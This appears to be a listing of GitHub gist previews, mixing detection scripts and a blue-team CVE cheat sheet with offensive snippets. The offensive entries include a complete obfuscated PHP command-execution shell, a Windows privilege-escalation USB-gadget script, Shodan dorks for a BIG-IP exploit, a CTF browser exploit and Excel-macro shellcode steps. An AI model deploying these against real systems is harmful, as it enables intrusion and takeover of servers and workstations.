@decalage2
decalage2 / detect_CVE-2021-40444.py
Last active August 19, 2022 16:01
Simple script to detect CVE-2021-40444 URLs using oletools
# simple script to detect CVE-2021-40444 exploits in DOCX using oletools
# v0.01 Philippe Lagadec 2021-09-09
# IMPORTANT NOTE: this script detects the few samples identified so far, by looking for "mhtml:" in remote objects URLs.
# But it is not confirmed yet if this detection is generic enough, for example if "mhtml:" is not mandatory.
# Moreover, for now only Office 2007+ files are supported.
# Detection for other file types (RTF, Office 97-2003, ...) will be implemented later.
import sys, zipfile
from oletools import oleobj, ooxml
@tothi
tothi / usbgadget_razer.sh
Created August 22, 2021 09:52
Razer USB gadget on Android for Local Privilege Escalation on Windows
# MINIMAL USB gadget setup using CONFIGFS for simulating Razer Gaming HID
# devices for triggering the vulnerable Windows Driver installer
# credits for the Windows Driver install vuln: @j0nh4t
#
# https://twitter.com/j0nh4t/status/1429049506021138437
# https://twitter.com/an0n_r0/status/1429263450748895236
#
# the script was developed & tested on Android LineageOS 18.1
@iidx
iidx / pbctf_vaccine_stealer.md
Last active November 10, 2025 05:00
[PBCTF 2020] Vaccine Stealer Write-up
@cihanmehmet
cihanmehmet / CVE-2020-5902.md
Last active December 31, 2024 19:04
BIGIP CVE-2020-5902 Exploit POC

🚨BIGIP CVE-2020-5902 Exploit POC 🔥🧱🔨👀


Shodan Search

title:"Big-IP®" org:"Organization Name"
http.title:"BIG-IP®- Redirect" org:"Organization Name"
http.favicon.hash:-335242539 "3992" org:"Organization Name"

🔸LFI

@rafaelbiriba
rafaelbiriba / tree-report.sh
Last active September 22, 2024 20:20
Generate tree report file on NAS and send it by email (optional)
#!/bin/bash
# Creates DISK0.tree, DISK1.tree, DISKx.tree inside each disk, with the output of tree command.
# After generating the report, it sends it via email using mail.
# To add more disks, just add DISK[x]=/full/path to the disk. Just make sure that the array indexes are sequential.
# Why this?
# With the reports from tree, in case of disk failure, you will know which file got lost and you can recover them, downloading or via backups.
# GIST: https://gist.github.com/rafaelbiriba/0ee7ca2baec1ef80a878c825295f09e1
EMAIL_ADDRESS="" # EMAIL_ADDRESS="email@gmail.com" or leave it blank "" to disable email
DISKS[0]="/srv/dev-disk-by-id-ata-WDC_WD80EMAZ-00WJTA0_ABC123-part1"
@terjanq
terjanq / rev_shell.php
Last active December 27, 2024 14:54
The shortest non-alphanumeric reverse shell script (19 bytes)
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;
/*
* In terminal:
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
* This is how the code will be produced, \xa0\xb8\xba\xab will be
* treated as constant therefore no " needed. It is also not copyable
* string because of non-ascii characters
*
* Explanation:
@SwitHak
SwitHak / 20200114-TLP-WHITE_CVE-2020-0601.md
Last active November 11, 2025 11:22
BlueTeam CheatSheet * CVE-2020-0601 * crypt32.dll | Last updated: 2020-01-21 1817 UTC

CVE-2020-0601 AKA ChainOfFools OR CurveBall

General

  • Microsoft disclosed a vulnerability in their monthly Patch Tuesday referenced under CVE-2020-0601.
  • The vulnerability was discovered by the U.S. National Security Agency, announced today (2020-01-14) in their press conference, followed by a blog post and an official security advisory.
  • The flaw is located in the "CRYPT32.DLL" file under the C:\Windows\System32\ directory.

Vulnerability explanation

  • NSA description:
  • NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows® cryptographic functionality.
@hama7230
hama7230 / exploit.htm
Last active August 17, 2020 19:47
Google Capture The Flag 2019 (Finals) Gomium Browser
<html>
<script type="text/goscript">
package main
import "fmt"
func bring_your_own_gadgts(x uint64, y uint64, z uint64, w uint64, v uint64) uint64 {
var a uint64 = 0xc3050f585a5e5f58;
var b uint64 = 0xdeadbeefdeadbeef+1
var c uint64 = 0xdeadbeefdeadbeef+2
@Arno0x
Arno0x / shellcode.xlsm
Last active August 20, 2025 05:01
XLM (Excel 4.0 macro) to execute a shellcode into Excel (32 bits) - French Macro code
BEWARE: THIS WILL ONLY WORK IN A FRENCH VERSION OF MS-OFFICE/EXCEL
1. Open Excel
2. Click on the active tab
3. Select "Insérer"
4. Click on "Macro MS Excel 4.0".
5. This will create a new worksheet called "Macro1"
================================================================================
In the Macro1 worksheet, paste the following block in cells in column A, starting in cell A1:
@mfowl
mfowl / ws.harness.py
Created March 4, 2019 19:38
Web Socket Harness
#!/usr/bin/python
import socket,ssl
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from websocket import create_connection, WebSocket
from urlparse import parse_qs
import argparse
import os
LOOP_BACK_PORT_NUMBER = 8000